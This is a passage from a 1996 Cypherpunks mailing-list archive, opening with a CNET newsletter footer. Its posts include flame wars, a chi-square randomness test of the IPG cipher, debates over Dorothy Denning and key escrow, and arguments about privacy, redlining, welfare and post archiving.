LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest
news on the Net? Our Desk Top News feature puts our 20 most recent
stories right there on your desktop for you to review at any time.
Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd


SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a
message:

   newsdispatch@cnet.com


SEARCH THE SITE FOR PARTICULAR TOPICS AND ARTICLES
Search the entire NEWS.COM database for stories you saw in News
Dispatch, or track any story we've run.

   http://www.news.com/Searching/Entry/0%2C17%2C0%2C00.html?nd


HOW TO SUBSCRIBE AND TO UNSUBSCRIBE
To subscribe to News Dispatch: Send mail to
listserv@dispatch.cnet.com with the message:

   subscribe news-dispatch (your name)

in the message body. To unsubscribe send the message:

   signoff news-dispatch

***************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 20:23:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Silence is not assent (re the Vulis nonsense)
In-Reply-To: <32A3BBD6.1ECA@gte.net>
Message-ID: <v03007802aecaabd56b0a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:05 AM +1300 12/4/96, Paul Foley wrote:

>So Tim May's silence in response to Vulis's nonsense, while some
>others came out in his favour "argues (not proves, just argues)
>heavily in favor of Dimitri" too?  Yeah, sure!  Wanna buy a bridge?

Actually, I've gotten several comments in e-mail to this effect, that if
I'm not actively defending myself, maybe I'm guilty. Most were written
roughly along the lines of:

"Yo, Tim! This Dimitri dewd is rilly, rilly makin' some heavy charges. So
how come your not, like, defending your self? Like, is he maybe like right?"

[spelling and grammatical errors deliberate, to provide the flavor of some
of the post-literate e-mail I get]

As to the ramblings of Dale Thorn about how John Gilmore has an obligation
to provide services on his machine, well, I gave up on Thorn a long time
ago. (In fact, I seem to recall a Dale Thorn I killfiled years ago on the
Extropians list...maybe I'm confusing his name with someone else, but it
sure rings a bell.)

I returned Sunday from several days away from my computer to find the
expected several hundred messages in my various IN baskets, but was
chagrinned to see just how many of them were pure garbage. Between the
"virtual Montgolfiering" of Don Wood and his critics, and the coprophilic
insults of Vulis, little of substance lay in between.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 3 Dec 1996 20:39:22 -0800 (PST)
To: bryce@digicash.com
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612031627.RAA21581@digicash.com>
Message-ID: <32A50047.2D13@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
> > I made note to this list time and time again requesting that people not
> > state the obvious - who owns what hardware and what rights they have to
> > pull the plug or whatever.  I seriously doubt that even the least
> > intelligent cypherpunk would misunderstand such a thing. Do you really
> > believe that myself and other cypherpunks want to "seize" John's equip-
> > ment, morally or otherwise?  You are correct about certain issues being
> > complex, but one of the big failings of the crowd who supported Gilmore
> > on this action was their failure to understand the point I've made here -
> > that we *do* understand basic property rights, etc.

> Ah.  Then we are in agreement here.  My "Rule" in the House
> Rules etc. simply stated the obvious fact, for the benefit of
> those who need it stated, of Gilmore's sole authority over the
> physical substrate.  I vaguely recall some subscribers implying
> or stating otherwise during the vanish Vulis fracas.  It would
> not at all surprise me if some people disagreed with this
> simple premise--  they habitually do so with regard to "public"
> establishments like bars and restaurants, and it isn't much of
> a stretch to start thinking of cypherpunks as a similarly
> "public" institution.

*We* are not in agreement.  If you insist on arguing that, I'll have to
resort to the "Spock" clarification (a la Star Trek), that it's not merely
what you say I object to, it's you I object to.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 3 Dec 1996 21:25:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: more IPG and random numbers
Message-ID: <199612040524.VAA18488@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain





I did some more experiments with the IPG stream-cipher
algorithim and random number tests.  Since IPG claim that their
algorithim passes chi-square tests of randomness, I found
a chi-square test program.  It's written by Peter Boucher
and was posted to sci.crypt in '93 (<2bum8sINN98j@roche.csl.sri.com>).
I found it on the web site crypto.com, sorry I don't remember the
exact URL but I can send it on request. From the comments:


> New, and improved anal.c, uses chi-square.
> 
> Does the 'runs up' (or 'runs down') test with run-length equal to two
> get me anything over the standard chi-square test?  I left it in.
> 
> BTW, the  buf[i] = (((seed = (1103515245*seed +12345)) >> 16) & 0xff);
> test fails this one at high numbers.  It's too evenly distributed.
> 
> -Peter
> 
> /* ***************************************************************
>  * anal.c --
>  *
>  * Copyright 1993 Peter K. Boucher
>  * Permission to use, copy, modify, and distribute this
>  * software and its documentation for any purpose and without
>  * fee is hereby granted, provided that the above copyright
>  * notice appear in all copies.
>  *
>  * Usage:  anal [input_file [output_file]]
>  *
>  * This program counts the occurances of each character in a file
>  * and notifies the user when a the distribution is too ragged or
>  * too even.
>  *
>  * Because the chance of getting byte B after byte A should be 1:256
>  * (for all A's and B's), the program also checks that the successors
>  * to each byte are randomly distributed.  This means that for each byte
>  * value (0 - 255) that occurs in the text, a count is kept of the
>  * byte value that followed in the text, and the frequency distribution
>  * of these succeeding bytes is also checked.
>  *
>  */
 
 [..]
 
> #define Vmin    (205.33) /*  1% chance it's less */
> #define Vlo (239.39) /* 25% chance it's less */
> #define Vhi (269.88) /* 75% chance it's less */
> #define Vmax    (310.57) /* 99% chance it's less */
> 
> 



First I ran the output from my version of the IPG algorithim that I
posted a couple days ago :

% ./boucher < ipg.out
Occurances:  n =  12000000, V=-8375833.71
Character occurances non-random
Successions: n =     46875, V=62287.82
Character successions non-random


Then I ran output from a test RNG that's basically a loop around random():

% ./boucher < myrandom/out
Occurances:  n =   3414720, V=213050.62
Character occurances non-random
Successions: n =     13338, V=1143.41
Character successions non-random

As you'd expect, it doesn't look like the output from random() is all
that great.

Finally I generated some output from a random seed generator
I wrote a while back.  It gets randomness from high-resolution timers
and hashing system files.  It's not as fast as repeated calls to
rand() but is faster than reading from /dev/random:

% ./boucher < out
Occurances:  n =    594352, V=269.75
================ Frequency distribution excellent! ====================
Successions: n =      2321, V=256.12
================= Successor randomness excellent! =====================


So, from these tests it looks like IPGs PRNG, which their stream
cipher is based on, is not a very good source of random values.  Hence
anything encrypted with it is succeptable to cryptoanalysis.
How succeptable, I do not know.  I am sort of curious, since IPG claimed
that their PRNG produces "perfect" random data as measured by chi-square
analysis, yet my analysis shows otherwise.  Perhaps I have coded the
algorithim incorrectly (I don't think so, it's pretty simple).
Or perhaps IPG chose their keys for the ABC tables carefully to
produce good results.  Unfortunately that would mean that keys
would have to be carefully chosen, something that's not very practical.


Based on the work I've done, and the work Igor Chudov posted, it
looks like the IPG algorithim is probably not very strong.  If two
relative crypto neophytes can find serious problems with it, imagine
what might happen if experienced cryptoanalists look at it.  If you were
one of the people who said "it's snake oil unless it's been been
tested for a zillion years" etc. you can pat yourself on the back now
'cause you were right.

However I think that some of us owe Mr Wood, if not an apology for the
excessive abuse he got on this list, at least some respect for
putting his money where his mouth is and posting his algorithims.
Maybe he'll do some research, tone down the hype, and come back
with something better.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 3 Dec 1996 21:57:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Counterproductive Dorothy Denning Flames
Message-ID: <199612040549.VAA06361@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 11:58 AM 12/3/1996, Blanc Weber wrote:
>     Denning is considered credible solely because her statements are
>     consistent with the interests and views of those in authority.
>
>Yet even if one's statements are not consistent with the established
>authorities, they could be  credible and noteworthy to a wide audience,
>were the statements in consonance with reality, expressing truths
>observable to any (once they were isolated and identified) and
>understable to those who hear or read them.

I agree.  I hope that my own statements have influence in spite of
my mouldy reputation.

(BTW, when I was young, hacking your opponents to death with a
broadsword was noble and now it is politically incorrect.  Privacy
skeptics nota bene!  Times do not change for the better.)

>So is Denning offensive because she is unpleasant per se, or do negative
>opinions of her exist because of who/what she is supporting? i.e.,
>because she is on "their" side, rather than "ours", because she employes
>her reasoning to their benefit, rather than to ours whose singular
>authority in this matter is under contention?

There are a number of reasons why Denning gets so much attention.

She is the most prominent spokesperson for the pro-GAK view and is,
therefore, a lightning rod.  There was a German newscaster during the
Nazi era who has been described as the "the German Walter Cronkite".
He was seen as a top war criminal and was tried at Nuremburg.  More
recently, after the wall fell many people in Germany were eager to
prosecute the East German newscaster who played a similar role in
promoting the Honecker regime.  It may be unjust, but people feel like
they actually know the spokesperson, for better or for worse.

She is seen as "one of us" because she wrote a book on cryptography.
As a consequence, she is seen as a traitor.  I am not endorsing this
view.

Many people believe that she could not honestly believe everything she
says.  Instead, they believe that she is sticking to a difficult party
line in anticipation of rewards down the road in terms of greater
prestige, career advancement, access to grant money, and maybe in
other ways.  This is called "toadying".  It is not going to be popular
amongst people who value intellectual integrity.

The alternative explanation to many is that she is clueless.  There is
some evidence that this is the correct explanation.

Denning, however, doesn't get off the hook.  In the technical
community, cluelessness is seen as being just short of a crime against
humanity.  Persistent cluelessness *is* a crime against humanity.

Toadying and cluelessness are both irritating to the author.

Denning may also be seen as a "suit" dictating to the programmers what
kinds of programs they may write.  This is not a formula for social
success in the technical community.

The academic community has been relatively quiet during the Clipper
debate.  There are very few members of academia who have gone on the
record repeatedly and publicly to say that GAK is the most ridiculous
thing we have ever heard and that the people proposing it must be out
of their minds, or Nazis, or both.  We all know that many academics
believe this to be true.  However, they are keeping quiet until it is
clear which way the wind sets.  This is irritating to many and it
spills over on Denning.  That is probably unfair.  Unless you think
she is a toady, in which case she is the canonical example of academic
indifference and cynicism.

In my last message, I said that it was irritating that Denning is seen
as a credible spokesperson.  Can we fairly hold Denning responsible
for the poor judgement of the media which is employed through the poor
judgement of the masses?  Not really, but she's handy.

Many people find the government's underhanded tactics irritating.
Rather than honestly raise the issue for public discussion, and
maturely, responsibly, and honestly discuss their views, the
government has resorted to subterfuge in an attempt to achieve its
goals.  Clipper was supposed to fool everybody into accepting GAK.
The export laws have been, to put it charitably, abused.  These
tactics are irritating because their intention is to deceive the
American people.  Denning appears to many to be party to these
tactics.

We have seen a number of people attempt to win the loyalty of the Net
constituency.  Gore attempted it with promises of massive funding.
Gingrich has attempted it through various pronouncements.  The usual
pattern is to offer a reward, but in return the constituency has to
compromise on something.  This pattern is seen over and over again.
Denning may be seen by some as yet another politician attempting to
get in a position to "deliver" the Net "precinct".  Some believe that
she positioned herself first as "one of us" and then attempted to sell
us out.

In the past, it was easier to sell out a constituency due to
widespread ignorance and misguided trust.  This didn't work for the
Net due to the high intellectual integrity of long time Net denizens,
the fact that the Net abhors ignorance, and our strong belief that we
do not need help reading our mail or paying for it.

Still, every politician that attempts this sort of thing is irritating
and Denning, if guilty, is no exception.

Sir Galahad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Tue, 3 Dec 1996 22:01:14 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
Message-ID: <199612040600.WAA16892@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com writes:
> >         we, and I mean all of us, who contribute the bulk of the
> >     "opinions" to cypherpunks gave the mainstream press the biggest
> >     possible hole to run straight over us, declaring us anarchists
> >     and wild-eyed fanatics. unless we as a group mend our ways, and
> >     turn out intelligent reasoning for the advance of cryptography as
> >     a mainstream way of life, we will be forever consigned not only to
> >     the dustbin, but subject to the ridicule of both the press and the
> >     government.

Quite surprising. This proves (to me) that cypherpunks is nothing more
than lipservice, covertly contributing to the death of the human
spirit which most people seem to want. 

"Unless we as a group mend our ways", indeed. By whose standard of
"mending"? If they construct the proper standard can they not
control you by that choice? Is your goal in life to be controlled
by the press and the government? 

> >         None of us are above a little sarcasm --but let's get the
> >     vituperative effluent out of the system.  do whatever you wish in
> >     private mail, but keep the profane rantings off the list.

The very existance of the "profane" keeps the "sacred" in existance
as well. If you cannot see that, then John Grubor's lesson is wasted
on you.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

             It is only knowledge that will destroy bias.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Tue, 3 Dec 1996 22:06:37 -0800 (PST)
To: dthorn@gte.net
Subject: No Subject
Message-ID: <Pine.BSF.3.91.961203220356.7988A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


You wrote:

>Sounds like a heck of a good idea, if:

>1. You can ID the bad logic with a high percent of success
>(90+ ?).

I shall endevor to do my best.  Initially, I shall only
comment on the most flagrant violations.  90+% should be
easy.

>2. You can comment/reply for all members fairly, but if>
>limited by the large number of postings (and fallacies ?),
>give priority to ???

Worst first.

>As far as Congress expelling members, are you saying that
>the Senate and/or H.O.R. can permanently eliminate a person
>elected by the people?

Yes, the congress is the sole determiner of the
qualifications of its members.

>Has this ever been tested?

Adam Clayton Powell.

Logos out





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Tue, 3 Dec 1996 22:12:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.BSF.3.91.961203220950.7988D-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


An anonymous poster wrote:

>Timothy C[*] May, a product of a* birth, appeared with
>coathanger through his head.

>/o)\ Timothy C[*] May
>\(o/

     I respectfully ask that the author of this post contact
me.  I am curious about his or her motives and would
appreciate it if he or she would address these questions:
     1) Why are you attacking Tim May?  Has he harmed you in
some way?
     2) Do you think such posts harm Tim May or help you in
some fashion?
     3) What do you hope to accomplish by these posts?
     4) Do you favor the use of strong cryptography to
preserve privacy?
     5) If Yes, do you think such posts are constructive to
that end? If No, is it your intent that your posts harm the
cause of strong cryptography and privacy?
     6) Why have you chosen to hide your true identity?

Logos out





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Tue, 3 Dec 1996 22:14:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.BSF.3.91.961203221223.7988E-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:

>Statements like these, with which cpunks retort to each
>other all the time, are examples of the ever-continuing
>exercise of logic which goes on the list - even if not
>formally delineated nor announced as being of such intent
>(LOGOS).
>
>I am glad for the points which "Sir Galahad" brought up,
>because they point out the difference between essential vs
>non-essential elements in arguments like this one.

My warmest thanks to Blanc Weber for 'beating me to the
punch' about 'Sir Galahad's' thoughtful analysis. His post
is the sort of give and take which focuses debate and
raises the level of intellectual discourse. Thank you, 'Sir
Galahad' and Blanc Weber. I hope other posters to this list
can emulate your examples.

Logos out





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 19:46:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <2.2.32.19961203024102.008bd390@netcom.com>
Message-ID: <yu7DyD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Ubois <jubois@netcom.com> writes:
> secretary. In 47 states welfare pays more than a janitor earns. Indeed, in
> the 6 most generous states, benefits exceed the entry-level salary for a
> computer programmer.

Igor may be in a better position to comment on welfare benefits in Oklahoma,
but I find the above statement highly questionable. New York is one of the
most generous states. An entry-level computer programmer with a B.S. and
no work experience fetches 45K on the average. Sure beats welfare.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 3 Dec 1996 20:20:11 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re:
Message-ID: <3.0.32.19961203221845.006a4438@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 12/3/96 EST, Bovine Remailer wrote:
>At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>>Take, for example, the practice of redlining.  How are people who live in
>>"bad" neighborhoods supposed to not reveal that information.
>
>You may lend your own money to whomever you wish.  If you do not wish
>to lend money to somebody, that is your business.

I consider it my business also, when people are denied opportunity because
of where they live.  I may also hire whomever I wish, but I would have to
pay the consequences if I happened to discriminate based on a protected
class while doing so.  That is the society in which I live.  If I dont like
it, I try to change it.  Our society is not libertarian.  If I would prefer
that form of society I would have to accept that result.  Therefore I
choose a balance between liberty and social justice.  There are times when
government should intervene.  I believe it should be as infrequent as
possible, but would not want to live in a society where disinfranchised
people have no possible recourse.  Your choice would apparently be different.

>It is difficult to understand why redlining should be illegal, to the
>extent that it even occurs.  When it does occur, we expect that eager
>entrepreneurs such as yourself will rush in to grab new customers.

I have not heard serious doubts for a while that redlining occurs.  But
then again we are on the net.  I would love to have the financial
wherewithal to startup such an enterprise.  Unfortuantely I reside in one
such neighborhood.  It is difficult enough to raise money to run a small
business (and turned out to be much easier to do without any bank lending
at all).  I have talked with people about starting their own banks.  When
you are working to make sure all the bills are paid it is a bit difficult
to also build an entirely new socio-economic structure.  

>As for the privacy issue, you seem to be proposing that you have some
>sort of right to borrow money on terms which are not acceptable to the
>lender.  You need not give your address just as you need not borrow
>the money.

Actually I was stating the opposite.  You do not need to do so.  You just
wont get the money if you dont.

>Of course, we hardly live in a free banking era.  Most people would
>prefer to bank with a company that respects their privacy.  Yet, banks
>are so tightly controlled in the United States that they most often
>will not dare to protect the privacy of their customers for fear of
>regulatory consequences.  When the service is provided, it cannot be
>advertised.

Whom would the service be more readily available to?  Who uses tax-havens?
Who has access to swiss bank accounts?  Are you insinuating that my local
bank actually has anonymous accounts and just won't tell me?  I wish that
people DID value anonymous banking in this country.  The fact is they just
don't care.  As long as they get short lines or myriads of ATM machines
they are happy.  I am largely in favor of banking deregulation.  There are
places where I simply draw the line.  Utter racism is one of them.
Everyone can now clamor that it just isnt true.  Banks have never
discriminated.  Its all a big lie.  Whatever.

(snip)
>You are in the unpleasant position of appealing for protection from
>the very people who have robbed you of your privacy.

You are right.  It is far from a perfect system.  We make trade-offs every
day.   The real world I live in is just not as simple as the Libertarian
Wet Dream(TM).

>
>Red Rackham
>

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 3 Dec 1996 22:22:40 -0800 (PST)
To: Jeff Ubois <jubois@netcom.com>
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <2.2.32.19961203024102.008bd390@netcom.com>
Message-ID: <32A517F0.486B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Ubois wrote:
> The numbers quoted in the press were based on a study by the Cato Institute,
> "The Work Welfare Trade-Off: An Analysis of the Total Level of Welfare
> Benefits by the State" by Michael Tanner, Stephen Moore, and David Hartman,
> September, 1995.  It's at
> * To match the value of welfare benefits, a mother with two children would
> have to earn as much as $36,400 in Hawaii or as little as $11,500 in
> Mississippi.
> * Welfare benefits are especially generous in large cities. Welfare
> provides the equivalent of an hourly pretax wage of $14.75 in New York
> City, $12.45 in Philadelphia, $11.35 in Baltimore, and $10.90 in Detroit.

[snip]

Why bother with theory?  By January sometime, I ought to have my own
personal set of numbers finalized. My mate and I are caring for three
orphaned children, we both work (good paying corporate jobs), yet it
appears we'll be collecting at least $1400 per month tax-free for the
kiddies, from various agencies, not including medical/dental benefits.

I'd guess the medical/dental will be worth $300, so $1700 divided by
172.5 (or 173.33) work hours is $9.80 to $9.85 per hour after taxes.
Imagine what it would be if we were also collecting for the grownups.

This is in the greater L.A. area.  It looks like the bigger the family,
i.e., the more dependents, the bigger the income.  Does this hold true
elsewhere?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Tue, 3 Dec 1996 22:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Just call the police"...yeah, right
In-Reply-To: <Pine.SUN.3.91.961203214226.16945C-100000@crl13.crl.com>
Message-ID: <Pine.BSF.3.91.961203221442.7988F-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 3 Dec 1996, Timothy C. May wrote:

> Saying "just call the police" strikes me as being one of
> the most absurd things I've ever heard on this list.
> 
> (If I receive a "Logos-gram" warning me I am being
> unpolite, you know where it'll go.)

The name of the informal logical fallacy Tim May has *not*
made is 'argumentum ad hominem' (literally, 'an argument 
to the man'; attacking one's opponent rather than dealing
with the subject under discussion; aka name calling).

Having said that, while Tim May has not committed a logical
fallacy, neither has he advanced a logical argument.  He
has merely stated his conclusory opinion of the other
person's comment.  By itself, it adds little or nothing of 
substance to the argument.

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 3 Dec 1996 20:40:00 -0800 (PST)
To: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Subject: Re: Anyone considered adding crypto into Microsoft Outlook?
Message-ID: <3.0.32.19961203223913.006a35b0@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain



>	It just struck me that it would probably make the most convenient
>platform for integrating cryptography. After all MAPI is an open,
extensible >API allowing ready access to the email "hooks" necessary. The
integration of >an address book with the email system makes it very easy to
add public key >information into a person's entry.
>
>	I'm not sure whether PGP or MOSS would be the most compatible format.
>Its quite possible that S/MIME would be more appropriate. 

I am currently using the new EPPI DLL for Eudora 3.0.  It integrates PGP
almost seamlessly.  I have had no problems at all ... yet.

>	It seems to me however that the main thing stopping the use of crypto has
been the pretty weedy interfaces. I'm afraid the MH hacks just don't cut
it. It seems to me that a downloadable plug-in would be very popular. I
know a lot of lawyers who would jump at the chance to use email but realize
they have to have crypto.
>
>	The main problem so far seems to be the impenetrability of the MAPI
documentation. Does anyone know of a usable reference or which of the
gazillion Microsoft Developer network CDs one can find more information?

hehe.  I totally agree.  MS = MaSsive Confusion.

>
>		Phill

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 21:01:58 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <199612031904.LAA23702@abraham.cs.berkeley.edu>
Message-ID: <199612040457.WAA05128@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John Anonymous MacDonald wrote:
> At 10:24 AM 12/3/1996, Timothy C. May wrote:
> >At 10:15 AM -0600 12/3/96, Igor Chudov @ home wrote:
> >
> >>This is primarily addressed to the person who supports cypherpunks
> >>mail-to-news gateway. If you know who such person is, please send
> >>his/her address to me.
> >....
> >>I am opposed to seeing my articles showing up in DejaNews and other
> >>search engines. All my emails and usenet postings have this header
> >>line. However, when cypherpunks-to-newsgroup gateway reposts all
> >>articles, it strips this header line. I believe it to be a mistake
> >>and hope that it will be corrected.
> >
> >Igor raises an important point.
> >
> >I believe he is misguided in his expectation that his public utterances in
> >a forum containing at least 1200 readers (and probably more, through
> >gateways, etc.) that he can limit uses of his posts. Any recipient of his
> >public utterances may choose to quote them in other articles, forward them
> >to friends, archive them on his own disks, etc.
> >
> > ...
> >
> >In a free society it is impossible to control what people do with material
> >given to them. The best means of protecting one's writings is not to
> >distribute them.
> 
> It is unlikely that anybody is going to pay money for our postings,
> even Igor's postings.  Copyright is not the issue.
> 
> Perhaps, Igor is worried about the unpredictable consequences of his
> posts being readable by anybody, anywhere, forever.  The solution to
> that problem is straightforward and I leave it as an exercise.
> 

Surely, I am not expecting that presence of some magic header line would
prevent everyone from archiving all my posts. I am fairly sure that
Dimitri Vulis, for example, archives all my messages just in case.
There is little one can do to prevent that.

I do, however, believe that limiting the availability of archived posts,
even to a small degree, is a valuable thing.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 21:05:26 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <v03007800aeca3aa7f70a@[207.167.93.63]>
Message-ID: <199612040501.XAA05167@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> >Perhaps, Igor is worried about the unpredictable consequences of his
> >posts being readable by anybody, anywhere, forever.  The solution to
> >that problem is straightforward and I leave it as an exercise.
> 
> Indeed, if Igor does not want his posts added to his dossier entry in the
> BlackNet Dossier Service (coming to an offshore site soon), he has various
> ways to ensure this. At least until better tools exist to link nyms to true
> names, a service BlackNet expects to offer (using the latest Bayesian
> inference techniques) within the next 18 months.
> 

Actually I think that you misunderstand the issue: even if I manage to
reduce availability of my posts by only 1%, that is already good. I was
not making pipe dreams about 100% protection from atchiving.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Tue, 3 Dec 1996 20:07:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: testing new Home Web site
Message-ID: <199612040406.XAA46358@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: scholars.bellevue.edu@ns.ccsn.edu, Banshee@evil-empire.com,
 phiberdelic@mailmasher.com, phiberdelic@hotmail.com,
 phreaker@scholars.bellevue.edu, phreaker@scholars.bellevue.edu,
 phiberdelic@hotmail.com, cypherpunks@toad.com
Date: Wed Dec 04 23:04:24 1996
Phiberelic Phreaker wrote, repeatedly...

> try this site and tell me how you like it
> if you dont like it then message Mr.Angry on that page
...
[gibberish]

Ok, Perry. I guess we're all coming over to your list now. <sigh>
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMqZJ0jUhsGSn1j2pAQEzUwfPVVsmLa2kGRrHqxk1jur6Ckg+hJAVhk5x
e6sNSen8Txa8jTy4noQmPFbekte/628Ig3zd0OvomsGSv0Cp6l9smHOOWZGA74lw
4XgQWyEz05V/twm0mec5M2MNBkOr12rTC4nIQG6zgRz2XJLpqs0ij8/WDLvOW1/w
zZT168ijF8UlQx/BneJfN4tgC3+KuSFqC6g7Hxz/Br+ZhQ3Zo8ptk+zdNbnjYwHS
61WmQ3m40dOhxflmaSxsE1jtLLWqTAJgbQN65VsJxRmUG6aYvfv8Q4Y7YZ4alGr5
CApU5eEat5lbkl3HcapG/4GYv3XfUvrnEL/TbMjmjJUqhg==
=lKHY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Tue, 3 Dec 1996 23:34:12 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Logos here
In-Reply-To: <Pine.SUN.3.91.961203223506.1499B-100000@crl8.crl.com>
Message-ID: <Pine.BSF.3.91.961203224626.10240A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> wrote:

> LOGOS <logos@c2.net> writes:
> 
> > Sovereign collegues,
> 
> You already sound like a jerk.

     Perhaps you should suspend judgment until you have the
opportunity to evaluate the content of my posts.  What are
you antagonistic to the use of honorifics?
 
> >      I am Logos. I have adopted this pseudonym to conceal my
> > 'true name'. I want the ideas which I shall be espousing
> > to stand or fall on their own merits and not on the basis
> > of biases that my name, sex, ethnicity, etc. might otherwise
> 
> sexual preferences...

     Yes, that and other catagorizations which are 
irrelevant to the primary focus of this list.
 
> That's right. You lack the decorum to spell either my
> first name or my last name correctly.

     'Decorum' has to do with polite behaviour.  While I 
was certainly remiss in my hasty spelling of your name, it 
was not intentional, therefore not a lack of decorum. I
